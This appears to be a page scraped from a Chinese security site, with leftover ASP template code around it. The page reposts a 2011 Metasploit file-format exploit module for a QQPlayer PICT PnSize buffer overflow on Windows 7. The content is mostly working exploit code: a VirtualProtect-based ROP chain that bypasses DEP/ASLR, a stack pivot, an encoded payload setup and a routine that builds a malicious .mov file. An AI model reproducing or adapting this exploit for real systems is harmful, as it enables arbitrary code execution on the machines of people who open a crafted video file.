<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("漏洞,QQPLAYER,WIN7,缓冲溢出漏洞,Exploit") PageTitle=stripHTML("QQPLAYER WIN7下PICT PnSize DEP_ASLR BYPASS缓冲溢出漏洞") ArticleIntro=stripHTML("") Articlecontent=stripHTML("# Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS# Date…") ModuleName = stripHTML("exploits") InfoID = stripHTML("113043") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> QQPLAYER WIN7下PICT PnSize DEP_ASLR BYPASS缓冲溢出漏洞 - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> videos >> 正文

QQPLAYER WIN7下PICT

2011/11/25 作者:不详 来源: 华盟收集
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>

# Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS
# Date: 2011,11,21
# Author: hellok
# Software Link: http://dl_dir.qq.com/invc/qqplayer/QQPlayer_Setup_32_845.exe
# Version: 32_845(lastest)
# Tested on: WIN7
require ''msf/core''
class Metasploit3 < Msf::Exploit::Remote
    include Msf::Exploit::FILEFORMAT
 
    def initialize(info = {})
        super(update_info(info,
            ''Name''           => ''QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS'',
            ''Description''    => %q{
                    This module exploits a vulnerability in QQPLAYER Player 3.2.
                When opening a .mov file containing a specially crafted PnSize value, an attacker
                may be able to execute arbitrary code.
            },
            ''License''        => MSF_LICENSE,
            ''Author''         =>
                [
                    ''hellok'',  #special thank corelanc0d3r for ''mona''
                ],
            ''References''     =>
                [
                ],
            ''DefaultOptions'' =>
                {
                    ''EXITFUNC'' => ''process'',
                    ''DisablePayloadHandler'' => ''true'',
                },
            ''Payload''        =>
                {
                    ''Space''          => 750,
                    ''BadChars''       => "",  #Memcpy
                    ''EncoderType''    => Msf::Encoder::Type::AlphanumUpper,
                    ''DisableNops''    =>  ''True'',
                    ''PrependEncoder'' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
                    ''EncoderOptions'' =>
                        {
                            ''BufferRegister'' => ''ECX'',
                        },
                },
            ''Platform'' => ''win'',
            ''Targets''        =>
                [
                    [ ''Windows 7'', { ''Ret'' => 0x67664cde } ],
                ],
            ''Privileged''     => false,
            ''DisclosureDate'' => ''11 21 2011'',
            ''DefaultTarget''  => 0))
 
        register_options(
            [
                OptString.new(''FILENAME'',   [ false, ''The file name.'',  ''msf.mov'' ]),
            ], self.class)
    end
    def exploit
        # !mona rop
        rop_gadgets =
        [
            
            0x00418007, # POP ECX # RETN (QQPlayer.exe)
            0x12345678,
            0x67664CE4, 
            0x01020304,
            0x10203040,
            0x22331122,
            0x23456789,
            
            0x00418007, # POP ECX # RETN (QQPlayer.exe)
            0x00a9c18c, # <- *&VirtualProtect()
            0x0054f100, # MOV EAX,DWORD PTR DS:[ECX] # RETN (QQPlayer.exe)
            #0x008e750c, LEA ESI,EAX # RETN (QQPlayer.exe)
            0x008cf099, # XCHG EAX,ESI # RETN
            
            0x6497aaad, # POP EBP # RETN (avformat-52.dll)
            0x100272bf, # ptr to ''call esp'' (from i18nu.dll)
            0x005fc00b, # POP EBX # RETN (QQPlayer.exe)
            0x00000331, # <- change size to mark as executable if needed (-> ebx)
            0x00418007, # POP ECX # RETN (QQPlayer.exe)
            0x63d18000, # RW pointer (lpOldProtect) (-> ecx)
            0x63d05001, # POP EDI # RETN (avutil-49.dll)
            0x63d05002, # ROP NOP (-> edi)
            0x008bf00b, # POP EDX # RETN (QQPlayer.exe)
            0x00000040, # newProtect (0x40) (-> edx)
            0x00468800, # POP EAX # RETN (QQPlayer.exe)
            0x90909090, # NOPS (-> eax)
            0x008bad5c, # PUSHAD # RETN (QQPlayer.exe)
        # rop chain generated by mona.py
        # note : this chain may not work out of the box
        # you may have to change order or fix some gadgets,
        # but it should give you a head start
        ].pack("V*")
 
        stackpivot = [target.ret].pack(''L'')
 
        buffer =rand_text_alpha_upper(90)#2
        buffer << rop_gadgets
        buffer << payload.encoded
 
        junk = rand_text_alpha_upper(2306 - buffer.length)
 
        buffer << junk
        buffer << stackpivot
        buffer << rand_text_alpha_upper(3000)#3000
 
        path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov" )
        fd = File.open(path, "rb" )
        sploit = fd.read(fd.stat.size)
        fd.close
 
        sploit << buffer
 
        file_create(sploit)
    end
end